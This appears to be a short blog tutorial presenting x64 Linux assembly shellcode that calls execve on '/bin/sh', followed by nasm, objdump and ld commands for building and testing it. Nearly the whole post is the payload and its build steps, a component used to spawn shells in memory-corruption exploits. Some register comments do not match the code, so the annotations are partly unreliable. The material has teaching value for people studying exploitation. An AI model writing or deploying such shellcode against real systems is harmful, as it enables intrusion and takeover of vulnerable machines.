Save this as shell.asm
global _start
_start:
jmp short shell_call ; jump to call
shellcode:
pop rsi ; Store address of "/bin/sh" in ESI
xor rax, rax ; Zero
mov byte [rsi + 7],al ; Null byte
mov qword [rsi + 8],rsi ;
mov qword [rsi + 16],rax ; Null pointer
lea rdi, [rsi] ; Copy sh string into rdi
lea rsi, [rax] ; Third execve (Null)
lea rdx, [eax] ; Second execve arg (Null)
xor al, 0x3b ; x64 execve syscall
syscall
shell_call:
call shellcode ; call shellcode and push db onto stack
db "/bin/sh"
Assemble the asm file with nasm:
nasm -f elf64 shell.asm -o shell.o
You can view the assembly code by dumping the object file with objdump:
objdump -D shell.o
You can test the functionality of the shellcode by linking the file into an executable. Due to the way the ASM code is written, I specified -N to make the .text section read/write:
ld -N -o shell shell.o
No comments:
Post a Comment